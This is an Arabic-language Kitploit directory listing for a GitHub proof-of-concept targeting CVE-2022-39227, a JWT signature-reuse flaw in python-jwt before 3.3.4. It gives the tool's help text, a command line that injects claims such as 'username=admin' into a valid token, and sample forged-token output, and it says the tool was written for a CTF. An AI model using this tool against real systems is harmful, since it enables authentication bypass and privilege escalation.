Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-39227 — CVE-2022-39227 : إثبات المفهوم | Kitploit
أدوات/GitHubGitHub/user0x1337/cve-2022-39227
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالأمن الويبCTFالمصادقة
GitHubuser0x1337/cve-2022-39227

CVE-2022-39227

CVE-2022-39227 : إثبات المفهوم

عرض المستودع
2212منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-39227

CVE-2022-39227: إثبات المفهوم

إثبات مفهوم لـ CVE-2022-39227. وفقًا لهذا CVE، يوجد خلل في التحقق من JSON Web Token. من الممكن باستخدام رمز صالح إعادة استخدام توقيعه مع ادعاءات معدلة.

المتطلبات:

  1. رمز JSON Web Token صالح.
  2. يجب أن يستخدم الخلفية مكتبة بايثون "python-jwt" في إصدار < 3.3.4

لتسهيل الاستخدام، كتبت إثبات مفهوم بسيط خلال CTF:

root@kitploit:~
usage: CVE-2022-39227-PoC [-h] -j TOKEN -i CLAIM

Proof of Concept for the JWT verification bug in python-jwt version < 3.3.4

options:
  -h, --help            show this help message and exit
  -j TOKEN, --jwt_token TOKEN
                        Original and valid JWT Token returned by the application
  -i CLAIM, --injected_claim CLAIM
                        Inject claim using the form "key=value", e.g. "username=admin". Use "," for more claims
                        (e.g. username=admin,id=3)

الاستخدام:

python3 cve_2022_39227.py -j <JWT-WEBTOKEN> -i "<KEY>=<VALUE>"

الإرجاع:

root@kitploit:~
{"  <SNIP>":"","protected":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9", "payload":"<SNIP>","signature":"18-caQyY-mnreIUb53kk5qI-axRoxSzQKyT033yOdUw"}

القيمة المرتجعة هي مزيج من JSON وتمثيل مضغوط. يجب لصق القيمة بأكملها بما في ذلك "{" و "}" كرمز JWT Web الجديد الخاص بك.

تنزيل الأداة